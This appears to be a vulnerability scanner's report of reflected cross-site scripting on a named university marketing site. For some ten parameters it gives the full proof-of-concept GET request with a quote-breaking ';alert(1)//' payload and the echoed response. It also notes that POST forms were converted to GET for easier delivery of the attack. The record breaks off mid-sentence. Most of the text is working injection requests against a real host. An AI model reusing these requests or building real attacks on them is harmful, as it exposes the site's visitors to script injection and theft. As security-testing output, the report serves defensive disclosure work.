GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95937af"%3balert(1)//10c054b4a93&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... 7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=&postal_code_int=&postal_code=&program_type=&program_type2=&pvp_campaign=14610_0957_9_95937af";alert(1)//10c054b4a93&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&desti ...[SNIP]...
The value of the unit request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload be4b9"%3balert(1)//0a352431f30 was submitted in the unit parameter. This input was echoed as be4b9";alert(1)//0a352431f30 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dirbe4b9"%3balert(1)//0a352431f30&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... &postal_code_int=&postal_code=&program_type=&program_type2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dirbe4b9";alert(1)//0a352431f30&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=®istered_nurse=no& ...[SNIP]...
The value of the user1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0112"%3balert(1)//a96fd83d2c4 was submitted in the user1 parameter. This input was echoed as f0112";alert(1)//a96fd83d2c4 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpmf0112"%3balert(1)//a96fd83d2c4&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... redit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpmf0112";alert(1)//a96fd83d2c4&user2=dr&user3=1&user4=&user5=&clientdelivery=®istered_nurse=no&mvtkey=D55602D1FF1E5348");
setAllowDestURLOnSubmit(true);
/* an_arr's params * 0 - poid * 1 - redirect href * 2 - has p ...[SNIP]...
The value of the user2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b6d2a"%3balert(1)//193f4f335e was submitted in the user2 parameter. This input was echoed as b6d2a";alert(1)//193f4f335e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=drb6d2a"%3balert(1)//193f4f335e&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... litary=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=drb6d2a";alert(1)//193f4f335e&user3=1&user4=&user5=&clientdelivery=®istered_nurse=no&mvtkey=");
The value of the user3 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6707"%3balert(1)//1e6342d0321 was submitted in the user3 parameter. This input was echoed as f6707";alert(1)//1e6342d0321 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1f6707"%3balert(1)//1e6342d0321&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1f6707";alert(1)//1e6342d0321&user4=&user5=&clientdelivery=®istered_nurse=&mvtkey=");
The value of the version request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d898f"%3balert(1)//925ecac98bf was submitted in the version parameter. This input was echoed as d898f";alert(1)//925ecac98bf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&provider=MSN&keyword=msn_careers_728x90_425006&user3=1&unit=dir&channel=banr&initiative=gen&mktg_prog=gen&placement=dsply&version=728x90d898f"%3balert(1)//925ecac98bf&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&creative_id=38954353&pvp_campaign=14610_0957_9_95&cm_mmc=dir-_-banr-_-MSN-_-gen&cm_mmca1=gen&cm_mmca2=dsply&cm_mmca3=38954353&cm_mmca4=20DR_Button_Orange_728x90_F9_Tag_swf&cm_mmca5=728x90&cm_mmca6=dir_dsply&cm_mmca7=msn_careers_728x90_425006&cm_mmca8=aptm&cm_mmca9=plcmt_targ&cm_mmca11=cpm&cm_mmca12=dr&cm_mmca13=1 HTTP/1.1 Host: www.aptm.phoenix.edu Proxy-Connection: keep-alive Referer: http://s0.2mdn.net/1676624/20DR_Button_Orange_728x90_F9_Tag.swf User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><head><META http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"><title>msn_ca ...[SNIP]... 2=&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90d898f";alert(1)//925ecac98bf&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=®istered_nurse=no&mvtkey=D55602D1FF1E5348");
The value of the level_education request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 137ab"%3balert(1)//63ddfe10507a70ca9 was submitted in the level_education parameter. This input was echoed as 137ab";alert(1)//63ddfe10507a70ca9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the program_type request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 824bc"%3balert(1)//faa69d1e4cac8c868 was submitted in the program_type parameter. This input was echoed as 824bc";alert(1)//faa69d1e4cac8c868 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the program_type2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c5d8f"%3balert(1)//b75aa6850b1597960 was submitted in the program_type2 parameter. This input was echoed as c5d8f";alert(1)//b75aa6850b1597960 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the registered_nurse request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e90f"%3balert(1)//35db81cf6d89d4995 was submitted in the registered_nurse parameter. This input was echoed as 2e90f";alert(1)//35db81cf6d89d4995 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the state request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2b8d"%3balert(1)//b06b0eb551423d5a9 was submitted in the state parameter. This input was echoed as d2b8d";alert(1)//b06b0eb551423d5a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript